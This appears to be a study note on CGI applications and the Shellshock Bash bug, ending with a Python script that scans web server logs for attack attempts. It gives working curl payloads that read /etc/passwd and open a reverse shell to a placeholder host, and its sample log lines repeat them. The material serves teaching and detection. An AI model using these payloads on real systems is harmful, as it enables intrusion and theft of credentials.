CGI Applications
Introduction
A Common Gateway Interface (CGI) is used to help a web server render dynamic pages and create a customized response for the user making a request via a web application.
CGI applications are primarily used to access other applications running on a web server.
CGI is essentially middleware between web servers, external databases, and information sources.
CGI scripts and programs are kept in the /cgi-bin directory on a web server.
Typically written in C, C++, Java, Perl, etc.
CGI scripts run in the security context of the web server.
CGI Applications - Shellshock [CVE-2014-6271]
The most well-known CGI attack is exploiting the Shellshock (aka, "Bash bug") vulnerability via CGI.
Resource: https://nvd.nist.gov/vuln/detail/CVE-2014-6271
Affected Versions:
GNU Bash up until version 4.3
Description: Shellshock is a security flaw in the Bash shell that allows an attacker to execute operating system commands that are included after a function stored inside an environment variable.
PoC Example:
env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable"
Nothing will happen when the environment variable is assigned a value.
If the target is vulnerable, whenever the environment variable is imported, the command echo vulnerable-shellshock will be executed.
If the target is NOT vulnerable, then the command echo not vulnerable will be executed.
Shellshock PoC to read any file:
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://target.com/cgi-bin/access.cgi
Shellshock PoC to gain a Reverse Shell:
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/your-ip/your-nc-port 0>&1' http://target.com/cgi-bin/access.cgi
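Both curl PoCs above place the function definition in a request header, which CGI passes to the script as an environment variable, so the same "() {" marker is visible to defenders in web server access logs. The detection sketch below is an added example, not part of the original page: it assumes Combined Log Format (which records only the request line, Referer and User-Agent), and the function name find_shellshock_attempts and the sample log lines are constructed for illustration.

```python
import re

# Assumption: Combined Log Format
#   ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
# A Bash function definition inside a logged value: "() {" with optional spaces.
FUNC_DEF_RE = re.compile(r'\(\)\s*\{')

def find_shellshock_attempts(lines, cgi_prefix="/cgi-bin/"):
    """Return one finding per log line whose request line, Referer or
    User-Agent carries a Bash function definition."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not Combined Log Format: skipped rather than guessed at
        fields = [f for f in ("request", "referer", "agent")
                  if FUNC_DEF_RE.search(m.group(f))]
        if not fields:
            continue
        parts = m.group("request").split()
        path = parts[1] if len(parts) >= 2 else ""
        findings.append({
            "ip": m.group("ip"),
            "path": path,
            "fields": fields,                           # where the marker was seen
            "targets_cgi": path.startswith(cgi_prefix),  # CGI path raises priority
            "status": int(m.group("status")),
        })
    return findings

# Constructed sample lines (documentation IP ranges), not from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2014:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2014:13:56:01 +0000] "GET /cgi-bin/access.cgi HTTP/1.1" 200 1587 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"',
    '198.51.100.7 - - [10/Oct/2014:13:56:09 +0000] "GET /cgi-bin/access.cgi HTTP/1.1" 500 612 "() { :;}; echo vulnerable-shellshock" "curl/7.38.0"',
    '203.0.113.5 - - [10/Oct/2014:13:57:12 +0000] "GET /cgi-bin/access.cgi HTTP/1.1" 200 88 "-" "curl/7.38.0"',
]

if __name__ == "__main__":
    for finding in find_shellshock_attempts(SAMPLE_LOG):
        print(finding)
```

A function definition sent in a header that the log format does not record will not appear here, so a clean result from access logs alone does not rule out an attempt.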